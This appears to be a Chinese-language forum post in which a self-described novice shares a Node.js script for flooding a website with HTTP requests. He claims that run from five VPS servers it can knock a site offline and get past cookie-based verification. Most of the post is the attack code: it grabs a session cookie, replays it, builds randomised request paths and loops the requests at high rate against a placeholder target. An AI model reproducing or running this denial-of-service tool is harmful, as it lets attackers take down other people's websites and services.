之前在公司上班没事,学习nodejs , 可以说压力山大,因学的 建筑工程技术 毕业 ,转行做互联网安全,对于我这种小白,哎!!
本脚本 需要 nodejs 脚本代码 VPS 服务器 。当时我采用了5台服务器 基本上,能打死。。。。
虽然有cookie 验证机制,照样能绕过。。
PS:本人小白,大牛勿喷!! 贴代码 。睡觉
代码截图:
脚本代码
[JavaScript] 纯文本查看 复制代码 /*
By:不良人
*/
console.log('Hello world'); //请无视输出!
var http = require('http');
var complete = 0;
var atkCount = 20;
function getCookie() {
var options = {
hostname: '对方域名或者IP', //仅限制网站
port: 80, //默认80端口
path: '这个我就不用说了吧!',
agent: false,
Conntion: 'Keep-Alive'
};
http.get(options, function (res) {
console.log("Got response: " + res.statusCode);
// console.log(res.headers['set-cookie']);
var src = res.headers['set-cookie'][0];
var s1 = '=';
var start = src.indexOf(s1);
var end = src.indexOf(";");
var cookie = src.substring(start + 1, end);
// console.log(src);
// console.log(cookie);
getData(cookie);
}).on('error', function (e) {
console.log("Got error: " + e.message);
});
}
function getData(cookie) {
var hf_key_str = 'hf_skey = 2693953.2693953..1447381409.1.3971aafb8bd532f20976867edde553b2;'; //请更改抓包值
var c1 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + hf_key_str + ' path=/;QCLOUD=a';
var c2 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + ' path=/;QCLOUD=a';
var options = {
hostname: '对方域名或者IP',
port: 80,
path: '网站路径路径',
agent: false,
Conntion: 'Keep-Alive',
Cookie: c2
};
http.get(options, function (res) {
console.log("Got response: " + res.statusCode);
if (res.statusCode == 200) {
complete += 1;
console.log('complete = ' + complete);
}
}).on('error', function (e) {
console.log("Got error: " + e.message);
});
// console.log(cookie);
}
function start() {
getCookie();
}
/*
setInterval(() => {
console.log('test');
}, 1000);
*/
function access() {
var aa = '/index/getBoat/'; //请更改
aa += Math.random() + '/';
aa += Math.random() + '/';
/*
aa += '13';
for (var i = 0; i < 9; i++) {
aa += (Math.random() % 10 );
}
*/
aa += '/';
aa += Math.random() + '/';
aa += Math.random() + '/';
aa += Math.random() + '/';
aa += Math.random() + '/';
aa += Math.random();
// var aa = '/index/getPwd/' + Math.random() + '/';
var options = {
hostname: '请更改',
port: 80,
path: aa,
agent: false,
Conntion: 'Keep-Alive'
};
http.get(options, function (res) {
console.log("Got response: " + res.statusCode);
if (res.statusCode == 200) {
complete += 1;
console.log('complete = ' + complete);
}
}).on('error', function (e) {
console.log("Got error: " + e.message);
});
}
setInterval(function () {
start();
// access();
}, 1 / atkCount); |